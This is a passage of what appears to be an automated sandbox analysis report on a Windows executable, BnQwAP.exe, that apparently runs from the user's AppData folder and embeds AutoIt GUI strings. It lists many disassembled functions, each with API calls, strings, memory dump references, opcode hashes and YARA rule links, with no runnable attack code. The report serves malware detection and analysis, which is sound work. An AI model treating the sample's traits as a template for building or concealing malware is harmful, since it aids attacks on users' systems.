                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3970641297-0
                                                                                                                    • Opcode ID: dfdf152a6b4170b9c012631cbf21b5eef6d1f67974f7a0a9349fa7dc94decf0b
                                                                                                                    • Instruction ID: 59fb8f16b0179160879e7a2ddc8acfe20ba08d4a6c20ab01b23cdbb32ae6d818
                                                                                                                    • Opcode Fuzzy Hash: dfdf152a6b4170b9c012631cbf21b5eef6d1f67974f7a0a9349fa7dc94decf0b
                                                                                                                    • Instruction Fuzzy Hash: 5B217F36A08BC58BE7A48B15E5447AAB7A1FB88B84F480135DA8D93B54DF3CD884CF00
                                                                                                                    Function 00007FF656092264 Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF655FE2A54: GetWindowLongPtrW.USER32 ref: 00007FF655FE2A71
                                                                                                                    • GetClientRect.USER32(?,?,?,?,?,00007FF65602AA36,?,?,?,?,?,?,?,?,?,00007FF655FE27AF), ref: 00007FF6560922C4
                                                                                                                    • GetCursorPos.USER32(?,?,?,?,?,00007FF65602AA36,?,?,?,?,?,?,?,?,?,00007FF655FE27AF), ref: 00007FF6560922CF
                                                                                                                    • ScreenToClient.USER32 ref: 00007FF6560922DD
                                                                                                                    • DefDlgProcW.USER32(?,?,?,?,?,00007FF65602AA36,?,?,?,?,?,?,?,?,?,00007FF655FE27AF), ref: 00007FF65609231F
                                                                                                                      • Part of subcall function 00007FF65608E894: LoadCursorW.USER32 ref: 00007FF65608E945
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClientCursor$LoadLongProcRectScreenWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1626762757-0
                                                                                                                    • Opcode ID: c10d22a9dfdb007e9cd3e446db2f26fc59a904d9b079c484f8598dfd72a81c9f
                                                                                                                    • Instruction ID: bc5ff5744f5a51fe858529ae0800f335294ab295911688e2f42f698638f102f9
                                                                                                                    • Opcode Fuzzy Hash: c10d22a9dfdb007e9cd3e446db2f26fc59a904d9b079c484f8598dfd72a81c9f
                                                                                                                    • Instruction Fuzzy Hash: 67216D36A18642C6EA24DB15E58016D7372FB84F88F984131DB4D93B59CF3DE948CB00
                                                                                                                    Function 00007FF65605CF68 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait_invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2979156933-0
                                                                                                                    • Opcode ID: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
                                                                                                                    • Instruction ID: f5a2198e00705abc170adfc2d46e75a23f20a717434aa114d35882f38122c689
                                                                                                                    • Opcode Fuzzy Hash: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
                                                                                                                    • Instruction Fuzzy Hash: D0212732A0C78186E311CF26B94026AB7A1FB94BD4F884236ED9E93B65CF7DD549C740
                                                                                                                    Function 00007FF656012FB8 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _ctrlfp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 697997973-0
                                                                                                                    • Opcode ID: 696024c0d85e9950b44dad3db47e8c6049c7f355de1dae667ed974782f5b2eb5
                                                                                                                    • Instruction ID: 8ba822c376216602d095e68a3bc03317efd3ff3bd9d030950bc01927a2641be1
                                                                                                                    • Opcode Fuzzy Hash: 696024c0d85e9950b44dad3db47e8c6049c7f355de1dae667ed974782f5b2eb5
                                                                                                                    • Instruction Fuzzy Hash: 9911DB21D0C54681D615DA38965117BE3F1FF9A788F684231FB89A67A5DE3FE444CB00
                                                                                                                    Function 00007FF65608FA78 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 357397906-0
                                                                                                                    • Opcode ID: 30ca773a2ae41b56c6e1d6d31e0bfc9c1d6a93403dc69e79101ac1cf7de44ee4
                                                                                                                    • Instruction ID: bfe9955bf0fb1e436fdb87b6113b39bef1e1f668878d44c394762fbaf814d51d
                                                                                                                    • Opcode Fuzzy Hash: 30ca773a2ae41b56c6e1d6d31e0bfc9c1d6a93403dc69e79101ac1cf7de44ee4
                                                                                                                    • Instruction Fuzzy Hash: 2221D8B6A04B41DFEB00CF75D94459C77B1F748B88B544826EA58A3B18DF78D658CB40
                                                                                                                    Function 00007FF65601B778 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$abort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1447195878-0
                                                                                                                    • Opcode ID: 5c68b7f432a971f9c1a5a37c5612d4f4cb9c7d627adb850da760d9ecfffa7c81
                                                                                                                    • Instruction ID: 7baead6724464e555d59420951b7496904885030c2f15beaafd3663e313e3d71
                                                                                                                    • Opcode Fuzzy Hash: 5c68b7f432a971f9c1a5a37c5612d4f4cb9c7d627adb850da760d9ecfffa7c81
                                                                                                                    • Instruction Fuzzy Hash: 7C018824F0924242FA59B7769B5613C52526F88B98F5C0539E91EE3BD6EF3EE80DC200
                                                                                                                    Function 00007FF656059260 Relevance: 6.0, APIs: 4, Instructions: 37sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2875609808-0
                                                                                                                    • Opcode ID: c6a5989f9dc195674d757a8e27f3c1042de8158b51fda3090b6682196588991b
                                                                                                                    • Instruction ID: b412fc6cf27b277b5fd9fd7f5459337b7d85f19f6847a7491b8ddbe4beb069df
                                                                                                                    • Opcode Fuzzy Hash: c6a5989f9dc195674d757a8e27f3c1042de8158b51fda3090b6682196588991b
                                                                                                                    • Instruction Fuzzy Hash: BD01D620A08B8642EA165B35914117FB361BFA5745F0C4335E94FB2560CF2EEC8DCA00
                                                                                                                    Function 00007FF65609072C Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1539411459-0
                                                                                                                    • Opcode ID: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
                                                                                                                    • Instruction ID: 35b39115892bc1a9a106d5657b0272c0373672e6d9d74b38c8ac6e91f93bc1c9
                                                                                                                    • Opcode Fuzzy Hash: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
                                                                                                                    • Instruction Fuzzy Hash: D901B535B1879142E7004F16FA0972DAB61BB82B98F5C0134DF5A53BA1CF7ED849CB00
                                                                                                                    Function 00007FF65604D4EC Relevance: 6.0, APIs: 4, Instructions: 24threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3974789173-0
                                                                                                                    • Opcode ID: 5cd93aab99a75fcfcb42631ab9fe43dfed1bd9e6d723e162398547d1910a1280
                                                                                                                    • Instruction ID: 2f3b95389c2836eebb47e5b2af1a9cdfe970827d2d8dfbb52b73bde2cd5b149e
                                                                                                                    • Opcode Fuzzy Hash: 5cd93aab99a75fcfcb42631ab9fe43dfed1bd9e6d723e162398547d1910a1280
                                                                                                                    • Instruction Fuzzy Hash: FEF06561A1950282FB514F62ED0476823A1EF58F8DF8C4134C90EE3250DF7D999DC300
                                                                                                                    Function 00007FF65604326E Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2889604237-0
                                                                                                                    • Opcode ID: 1feedfad755e607c49e01145a3823af596c92df2e00356d80eed4a018d1c4b5c
                                                                                                                    • Instruction ID: 433c167cf0c5f1745305dd53897becf0e328aa0d886a507712517823e846775f
                                                                                                                    • Opcode Fuzzy Hash: 1feedfad755e607c49e01145a3823af596c92df2e00356d80eed4a018d1c4b5c
                                                                                                                    • Instruction Fuzzy Hash: A6E01AA4B093028AFA049F63EA1C2392256AF49FC9F084430CD0EA3B55DE7EA409CB00
                                                                                                                    Function 00007FF656043287 Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2889604237-0
                                                                                                                    • Opcode ID: 0f8fd1d3423bd3015dfaeae2d2106595fe3726f148ce33332917fba087c4fcce
                                                                                                                    • Instruction ID: 0a035bb67b7e4105f4c3eb7edaa2644fd763a2b900ba5f8e53bab51ee5c17176
                                                                                                                    • Opcode Fuzzy Hash: 0f8fd1d3423bd3015dfaeae2d2106595fe3726f148ce33332917fba087c4fcce
                                                                                                                    • Instruction Fuzzy Hash: 6BE0BF64F097528AEA05DF63E95C1392256AF49FD9F084434CD0EA7F55DE7EA409CB00
                                                                                                                    Function 00007FF656051D10 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 200comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ContainedObject
                                                                                                                    • String ID: AutoIt3GUI$Container
                                                                                                                    • API String ID: 3565006973-3941886329
                                                                                                                    • Opcode ID: ec532330f33b0a9812ac3d9e654419ff88b42a82dbb45e6ba561f09289b70eff
                                                                                                                    • Instruction ID: 6b19d7df01360043da5035a8f47fc5ba378f74651f33af32ea4a0bc9e21f9c8a
                                                                                                                    • Opcode Fuzzy Hash: ec532330f33b0a9812ac3d9e654419ff88b42a82dbb45e6ba561f09289b70eff
                                                                                                                    • Instruction Fuzzy Hash: 47913536604B4282DB24DF29E5406AD73A5FB88F98F598136DF8D93724EF7AD849C300
                                                                                                                    Function 00007FF65601D0A8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: e+000$gfff
                                                                                                                    • API String ID: 3215553584-3030954782
                                                                                                                    • Opcode ID: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
                                                                                                                    • Instruction ID: 115f081b2a53be5954f10790f6b1abcbe8e7d203fae80a349732da5159bdd41f
                                                                                                                    • Opcode Fuzzy Hash: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
                                                                                                                    • Instruction Fuzzy Hash: CD514762B18BC196E7258F359E403696B91EB91B94F4C9231CA9CC7BD5CF3ED449C700
                                                                                                                    Function 00007FF65601A09C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                                    • String ID: C:\Users\user\AppData\Roaming\BnQwAP.exe
                                                                                                                    • API String ID: 3307058713-349923063
                                                                                                                    • Opcode ID: d66799c7fb8d49ba8911ba2da8beafd52f849db9660eadf2b3aeaa59b2ad0887
                                                                                                                    • Instruction ID: ea7ba9858dee1a00007ff5072ca1d7dca0a89f191cb180462acf19006496d0b6
                                                                                                                    • Opcode Fuzzy Hash: d66799c7fb8d49ba8911ba2da8beafd52f849db9660eadf2b3aeaa59b2ad0887
                                                                                                                    • Instruction Fuzzy Hash: 21418132A08B528AEB15DF25DE400BD67A5FF447D8B594035E90EA7755DF3EE489C300
                                                                                                                    Function 00007FF656089E08 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$CreateDestroyMessageObjectSendStock
                                                                                                                    • String ID: static
                                                                                                                    • API String ID: 3467290483-2160076837
                                                                                                                    • Opcode ID: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
                                                                                                                    • Instruction ID: 6a0a111752768e9ecc8d030b7daf424c5807bc46dc9516875e976467faccab49
                                                                                                                    • Opcode Fuzzy Hash: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
                                                                                                                    • Instruction Fuzzy Hash: B3415C325486C286D670DF25E0407AFB7A1FB84B94F144235EBEA53A99DF3DD885CB00
                                                                                                                    Function 00007FF656075E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWidehtonsinet_addr
                                                                                                                    • String ID: 255.255.255.255
                                                                                                                    • API String ID: 2496851823-2422070025
                                                                                                                    • Opcode ID: e55c8c587f1448b1a4207f66a752895f1a07630204b4ee05391494375fe3cc25
                                                                                                                    • Instruction ID: 9f70709a1e626284820cebedf297642c586953ed67ec6d67d0b8778dfd9c2994
                                                                                                                    • Opcode Fuzzy Hash: e55c8c587f1448b1a4207f66a752895f1a07630204b4ee05391494375fe3cc25
                                                                                                                    • Instruction Fuzzy Hash: 4C31E136A1864681EB54CF22D9492BD3760FF94F98F098532DE5E93391EE3ED44AC700
                                                                                                                    Function 00007FF6560703C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
